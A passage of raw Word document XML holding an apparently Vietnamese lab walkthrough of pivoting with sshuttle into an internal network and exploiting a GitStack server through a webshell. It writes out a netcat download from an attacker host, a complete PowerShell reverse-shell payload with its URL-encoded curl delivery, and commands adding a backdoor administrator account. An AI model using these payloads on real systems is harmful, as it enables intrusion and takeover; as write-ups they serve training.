    <w:p w14:paraId="6BDFD85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&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057BF28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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F12F17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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C546D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&lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3B17A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4906EC9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    ^registration/login/$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AFE43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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD370D1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599BE36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&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6FF2A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBDFE9C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&lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD9B1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C94658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                ^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gitstack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/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4406C1B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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524301C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA8A0E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&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3332E90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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4321D90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&lt;li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0490B41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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E58E30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    ^rest/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730AE1ED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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038A458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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A98F17A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  &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0874B51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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00539F5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ol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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2315066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&lt;p&gt;The current URL, &lt;code&gt;&lt;/code&gt;, didn't match any of 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these.&lt;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/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A46F6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575352B5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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3298C6E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2A12EA3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&lt;div id="explanation"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF8A6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&lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135D967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You're seeing this error because you have &lt;code&gt;DEBUG = True&lt;/code&gt; in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08632A08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your Django settings file. Change that to &lt;code&gt;False&lt;/code&gt;, and Django</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F50289B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  will display a standard 404 page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2132A8E3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  &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F85D97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 &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF5861F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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32273AD0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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26081874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F9EDA48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Pivoting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với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sshuttle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2C28C237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sshuttle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-r </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00142778">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>root@10.200.84.200</w:t>
        </w:r>
      </w:hyperlink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ssh-cmd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"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id_wr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" 10.200.84.0/24 -x 10.200.84.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AF8B74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385A1F5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To flush DNS cache in Debian GNU/Linux use command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2EC0E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sudo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-resolve --flush-caches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D468377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If you get error message: “Failed to flush caches: Unit dbus-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org.freedesktop</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00142778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.resolve1.service not found.“, enable the service on your system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E56C7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sudo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systemctl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enable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systemd-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00142778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>resolved.service</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1DC3F586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Then again run the “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-resolve –flush-caches” command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AED85F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>You can then check the statistics in order to make sure that your cache size is now zero, thus cleared. Run the following command in order to view the statistics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAF5AF4" w14:textId="77777777" w:rsidR="00142778" w:rsidRPr="00142778" w:rsidRDefault="00142778" w:rsidP="00142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sudo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systemd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-resolve --statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140FD17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353A198C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10F2E090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509DA4FA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sshuttle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pivot qua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lỗ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hổng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tạo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nên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nối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tương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tự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vpn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4ACEF6E7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Điều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xảy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ra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bị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xâm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nhập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bạn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đang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nối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một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phần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mạng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con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bạn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đang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cố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gắng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lấy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quyền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truy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cập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 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Ví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dụ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nếu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chúng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tôi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đang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nối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với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172.16.0.5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cố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chuyển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tiếp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172.16.0.0/24,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thì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chúng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tôi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sẽ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chủ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bị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xâm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nhập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bên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trong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mạng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con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mới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được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chuyển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tiếp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, do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gián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đoạn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nối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khiến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cụ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00E2E99E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giải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quyết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đề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chúng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tôi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yêu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cầu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sshuttle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loại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trừ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chủ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bị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xâm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phạm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khỏi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phạm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vi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mạng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con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bằng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cách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sử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dụng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 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xtắc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C2902E1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sử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dụng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ví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dụ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trước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chúng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tôi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</w:t>
      </w:r>
      <w:r w:rsidRPr="00142778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/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sshuttle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-r </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00142778">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>user@172.16.0.5</w:t>
        </w:r>
      </w:hyperlink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172.16.0.0/24 -x 172.16.0.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C603938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Điều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sẽ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phép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sshuttle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tạo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nối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gián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đoạn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chính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428009A0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4FE0D20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Truy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cập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được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IP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host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khác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614A61D6" w14:textId="63A18733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ACB10" wp14:editId="06DCE749">
            <wp:extent cx="4391025" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="9" name="Picture 9" descr="C:\aff41bbea61d8ee25c9ba785de3259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ff41bbea61d8ee25c9ba785de32592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2714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searchsploit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tìm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cve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51203063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Thay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đổi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, port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. Ở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cuối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file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sẽ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đường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dẫn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được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bôi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đậm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như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hình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Thay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đổi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thành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tên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bất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nếu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muốn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AED2533" w14:textId="6DB8E2AE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C3CE6E6" wp14:editId="355DE221">
            <wp:extent cx="16068675" cy="1285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86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EA3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file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git server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFD63BF" w14:textId="73D603E6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772E757" wp14:editId="3D3D4D94">
            <wp:extent cx="4410075" cy="1514475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="7" name="Picture 7" descr="C:\0d736cc0b619c682c23577aa741b1c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0d736cc0b619c682c23577aa741b1ce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5939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Ở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đây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đã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chiếm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được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quyền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cao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nhất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Với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quyền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xác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nhận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windows. Ở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đây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xuất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hiện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đề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script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xong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câu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lệnh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thì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phải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edit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lại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code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chạy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lệnh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khác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như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vậy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khá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phức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tạp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51B3BA72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Ta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sử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dụng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cách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khác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curl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post command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lên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server.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url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chính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đường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dẫn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file shell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công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từ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file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lúc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nãy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7047FFA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curl -X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00142778">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://IP/web/exploit-USERNAME.php</w:t>
        </w:r>
      </w:hyperlink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-d "a=COMMAND"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AE8E7D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7D9CFDD7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Cách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khác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burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AC3164D" w14:textId="01F1CF6F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E21A9A7" wp14:editId="414B5467">
            <wp:extent cx="4448175" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="C:\ef59ba41742bafcb1add5e6e515142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f59ba41742bafcb1add5e6e515142a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2F75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capture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url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send to repeater,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sau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thêm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phần</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E989124" w14:textId="77777777" w:rsidR="00142778" w:rsidRPr="00142778" w:rsidRDefault="00142778" w:rsidP="00670635">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind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Content-Type: application/x-www-form-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urlencoded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br/>
        <w:t>a=&lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04F2CF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send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nhận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phản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hồi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16843546" w14:textId="552692E2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765C96" wp14:editId="45333EC3">
            <wp:extent cx="4142096" cy="4857793"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Picture 5" descr="C:\d529352f47447256adfe620d388d05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529352f47447256adfe620d388d05b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60" cy="486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8B9B" w14:textId="7E43EBA5" w:rsid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Sau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truy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cập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lại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firewall server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có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ip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.200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curl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down bin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về</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00170310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EB42642" w14:textId="2C4E2689" w:rsidR="00170310" w:rsidRDefault="00170310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70310">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl http://10.50.85.26:8000/nc -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00170310">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>o .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00170310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170310">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00170310">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-dai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D292B0A" w14:textId="4AB6557E" w:rsidR="00D81903" w:rsidRPr="00142778" w:rsidRDefault="00D81903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+x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nc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>-dai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B849698" w14:textId="6F1C047D" w:rsid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3CAB610" wp14:editId="7215F3C5">
            <wp:extent cx="4410075" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="4" name="Picture 4" descr="C:\2deb2ce1e446e9f27302f3b3b6e18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2deb2ce1e446e9f27302f3b3b6e18c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1E15" w14:textId="3C82D48D" w:rsidR="005F00A2" w:rsidRPr="00142778" w:rsidRDefault="005F00A2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5F00A2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2107C2" wp14:editId="123809F0">
            <wp:extent cx="5943600" cy="1062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2486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9902AAE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Trên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server firewall, ta add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thêm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 port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mới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tạo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reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC234AC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142778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>firewall-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cmd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--zone=public --add-port PORT/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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DD2D763" w14:textId="7A0682B1" w:rsidR="00BF283F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lắng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nghe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port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vừa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tạo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="66D0C5D2" w14:textId="6BAFD872" w:rsidR="009E3A03" w:rsidRDefault="009E3A03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9E3A03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009E3A03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E3A03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009E3A03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nlvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009E3A03">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 15426</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5C1CE1" w14:textId="2BFA5670" w:rsidR="00142778" w:rsidRPr="00142778" w:rsidRDefault="00BF283F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08EB4C3" wp14:editId="0C30174B">
            <wp:extent cx="4333875" cy="590550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="11" name="Picture 11" descr="C:\1ffbb5374646ac8c30908d3ac2bbe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1ffbb5374646ac8c30908d3ac2bbe46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437" b="65974"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="43338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CCE11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Trở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lại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git server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payload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sau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tạo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reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C16E27C" w14:textId="7F1D27A5" w:rsidR="003D79FD" w:rsidRPr="00462711" w:rsidRDefault="003A7F31" w:rsidP="00462711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powershell.exe -c "$client = New-Object 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System.Net.Sockets.TCPClient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('IP',PORT);$stream = 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client.GetStream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();[byte[]]$bytes = 0..65535|%{0};while(($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i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 = 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stream.Read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($bytes, 0, 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bytes.Length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)) -ne 0){;$data = (New-Object -TypeName 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System.Text.ASCIIEncoding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).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GetString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($bytes,0, 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i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);$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sendback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 = (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iex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 $data 2&gt;&amp;1 | Out-String );$sendback2 = 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sendback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 + 'PS ' + (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pwd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).Path + '&gt; ';$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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>sendbyte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A7F31">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAED"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7D89E4" w14:textId="587E9B41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nhấn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ctrl+u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ở payload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để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encode payload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nếu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burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A1FE5FD" w14:textId="34D78806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B78045" wp14:editId="3F2CCD94">
            <wp:extent cx="4429125" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="C:\32043f4078361008d86f6640d59a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32043f4078361008d86f6640d59a99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54DA" w14:textId="3A9ECE83" w:rsidR="005F094D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Nếu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curl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thì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dùng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comma</w:t>
      </w:r>
      <w:r w:rsidR="00447C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r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d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sau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3A84B7F4" w14:textId="77777777" w:rsidR="001E7F5C" w:rsidRPr="001E7F5C" w:rsidRDefault="001E7F5C" w:rsidP="001E7F5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E7F5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl -X POST http://10.200.84.150/web/exploit-dai.php -d "a=powershell.exe%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.84.200%27%2C15426%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523A7DCE" w14:textId="1C7CF026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4C0A5AB" wp14:editId="3BF76225">
            <wp:extent cx="4448175" cy="742950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="C:\d7cdecc3069710c4a312751cec54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7cdecc3069710c4a312751cec5412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3096" w14:textId="22BC86EB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7AC9C1C8" w14:textId="7C73BF4B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3375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A0595A" wp14:editId="1F8640E1">
            <wp:extent cx="4419600" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Picture 1" descr="C:\1ffbb5374646ac8c30908d3ac2bbe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1ffbb5374646ac8c30908d3ac2bbe4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06F3" w14:textId="77777777" w:rsidR="00142778" w:rsidRPr="00142778" w:rsidRDefault="00142778" w:rsidP="00142778">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1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Kết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quả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là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chiếm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thêm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142778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00142778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B4B08B" w14:textId="06B8EF73" w:rsidR="007F40C7" w:rsidRDefault="00CF4F48" w:rsidP="0014277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group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rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A4BCF3B" w14:textId="068DA609" w:rsidR="00CF4F48" w:rsidRPr="00CF4F48" w:rsidRDefault="00CF4F48" w:rsidP="00CF4F48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4F48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>net user dai1 nodai1 /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959D6A4" w14:textId="77777777" w:rsidR="00CF4F48" w:rsidRPr="00CF4F48" w:rsidRDefault="00CF4F48" w:rsidP="00CF4F48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4F48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF4F48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF4F48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Administrators dai1 /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74521B3E" w14:textId="468C11A4" w:rsidR="00CF4F48" w:rsidRDefault="00CF4F48" w:rsidP="00CF4F48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4F48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF4F48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF4F48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Remote Management Users" dai1 /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B6FD8" w14:textId="1152DBA5" w:rsidR="00CF4F48" w:rsidRDefault="00CF4F48" w:rsidP="00142778">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF4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C1119F" wp14:editId="33CDE1F2">
            <wp:extent cx="5839640" cy="15242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A4B" w14:textId="2FD2ECD5" w:rsidR="00E9605A" w:rsidRDefault="00E9605A" w:rsidP="00142778">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D47C33" w14:textId="77AD7BAD" w:rsidR="00E9605A" w:rsidRDefault="00E9605A" w:rsidP="00142778">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556EA32B" w14:textId="723A1B76" w:rsidR="00E9605A" w:rsidRDefault="00E9605A" w:rsidP="00E960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9605A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>POST EXPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3C7800" w14:textId="3CD474D6" w:rsidR="00E9605A" w:rsidRDefault="00E9605A" w:rsidP="00E9605A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D93119B" w14:textId="6898909A" w:rsidR="00E9605A" w:rsidRDefault="000369B7" w:rsidP="000369B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000369B7">
        <w:rPr>
